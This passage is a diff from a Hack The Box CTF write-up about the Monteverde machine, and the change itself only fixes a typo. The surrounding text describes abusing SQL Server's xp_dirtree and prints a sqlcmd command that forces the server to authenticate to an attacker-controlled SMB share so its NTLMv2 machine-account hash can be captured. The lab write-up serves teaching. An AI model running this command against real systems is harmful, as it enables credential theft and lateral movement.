alex-w-hunt/CTF_Writeups/Hack The Box/Monteverde.md

 (1 rows affected)
 ```

-I then attempted to see if we could escalated privleges via xp_cmdshell, however we did not have the permission to enable that.
+I then attempted to see if we could escalated privileges via xp_cmdshell, however we did not have the permission to enable that.
 I did however note that we could use `xp_dirtree`.
 I used this to "authenticate" against my local machine and grab the `MONTEVERDE$` machine account NTLMv2 hash.

 ```
 *Evil-WinRM* PS C:\Program Files\Microsoft SQL Server> sqlcmd -S localhost -E -q "EXEC master..xp_dirtree '\\10.10.10.10\share\'"